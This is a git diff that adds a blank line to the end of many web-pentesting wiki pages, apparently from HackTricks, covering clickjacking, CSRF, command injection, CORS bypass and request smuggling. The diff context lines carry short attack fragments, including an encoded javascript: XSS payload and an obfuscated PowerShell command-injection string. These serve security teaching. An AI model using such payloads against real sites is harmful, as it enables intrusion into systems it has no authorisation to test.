a/src/pentesting-web/bypass-payment-process.md +++ b/src/pentesting-web/bypass-payment-process.md @@ -41,3 +41,4 @@ If you encounter a parameter that contains a URL, especially one following the p {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/captcha-bypass.md b/src/pentesting-web/captcha-bypass.md index 6026d0e83..d8b38e4b4 100644 --- a/src/pentesting-web/captcha-bypass.md +++ b/src/pentesting-web/captcha-bypass.md @@ -37,3 +37,4 @@ To **bypass** the captcha during **server testing** and automate user input func {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/clickjacking.md b/src/pentesting-web/clickjacking.md index 06f5df8d3..aadcd1184 100644 --- a/src/pentesting-web/clickjacking.md +++ b/src/pentesting-web/clickjacking.md @@ -204,3 +204,4 @@ if (top !== self) { {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/client-side-path-traversal.md b/src/pentesting-web/client-side-path-traversal.md index 2c6b3991d..55b1c475e 100644 --- a/src/pentesting-web/client-side-path-traversal.md +++ b/src/pentesting-web/client-side-path-traversal.md @@ -16,3 +16,4 @@ A client side path traversal occurs when you can **manipulate the path of a URL* {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/client-side-template-injection-csti.md b/src/pentesting-web/client-side-template-injection-csti.md index 76b48187c..b127c789b 100644 --- a/src/pentesting-web/client-side-template-injection-csti.md +++ b/src/pentesting-web/client-side-template-injection-csti.md @@ -89,3 +89,4 @@ javascript:alert(1)%252f%252f..%252fcss-images {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index d05b312e4..4e6472199 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -143,3 +143,4 @@ powershell C:**2\n??e*d.*? # notepad + diff --git a/src/pentesting-web/cors-bypass.md b/src/pentesting-web/cors-bypass.md index db36b5f2f..d1e56ca3b 100644 --- a/src/pentesting-web/cors-bypass.md +++ b/src/pentesting-web/cors-bypass.md @@ -445,3 +445,4 @@ You can find more information about the previous bypass techniques and how to us {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/crlf-0d-0a.md b/src/pentesting-web/crlf-0d-0a.md index 802317a1c..5d697aed3 100644 --- a/src/pentesting-web/crlf-0d-0a.md +++ b/src/pentesting-web/crlf-0d-0a.md @@ -222,3 +222,4 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/csrf-cross-site-request-forgery.md b/src/pentesting-web/csrf-cross-site-request-forgery.md index 389f0f2d0..c03b56215 100644 --- a/src/pentesting-web/csrf-cross-site-request-forgery.md +++ b/src/pentesting-web/csrf-cross-site-request-forgery.md @@ -689,3 +689,4 @@ with open(PASS_LIST, "r") as f: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/dependency-confusion.md b/src/pentesting-web/dependency-confusion.md index 8ca02f3cc..a2287183f 100644 --- a/src/pentesting-web/dependency-confusion.md +++ b/src/pentesting-web/dependency-confusion.md @@ -45,3 +45,4 @@ In the [**original post about dependency confusion**](https://medium.com/@alex.b {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/domain-subdomain-takeover.md b/src/pentesting-web/domain-subdomain-takeover.md index 563f28335..b4bca5b9d 100644 --- a/src/pentesting-web/domain-subdomain-takeover.md +++ b/src/pentesting-web/domain-subdomain-takeover.md @@ -81,3 +81,4 @@ For cloud providers, verifying domain ownership is crucial to prevent subdomain {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/email-injections.md b/src/pentesting-web/email-injections.md index 6a8b254c2..e75f93b88 100644 --- a/src/pentesting-web/email-injections.md +++ b/src/pentesting-web/email-injections.md @@ -205,3 +205,4 @@ For more detailed information, AWS's official documentation on handling bounces {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md b/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md index 90fa7a652..1c21829db 100644 --- a/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md +++ b/src/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md @@ -199,3 +199,4 @@ From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/grpc-web-pentest.md b/src/pentesting-web/grpc-web-pentest.md index 1b1b49aec..3ea9c8e67 100644 --- a/src/pentesting-web/grpc-web-pentest.md +++ b/src/pentesting-web/grpc-web-pentest.md @@ -152,3 +152,4 @@ grpc.gateway.testing.ClientStreamingEchoResponse: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/h2c-smuggling.md b/src/pentesting-web/h2c-smuggling.md index 8af5e2efc..5f2a27a26 100644 --- a/src/pentesting-web/h2c-smuggling.md +++ b/src/pentesting-web/h2c-smuggling.md @@ -94,3 +94,4 @@ Check the labs to test both scenarios in [https://github.com/0ang3el/websocket-s {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/http-connection-contamination.md b/src/pentesting-web/http-connection-contamination.md index 03814abd0..3858047f1 100644 --- a/src/pentesting-web/http-connection-contamination.md +++ b/src/pentesting-web/http-connection-contamination.md @@ -25,3 +25,4 @@ Best practices include avoiding first-request routing in reverse proxies and bei {{#include ../banners/hacktricks-training.md}} +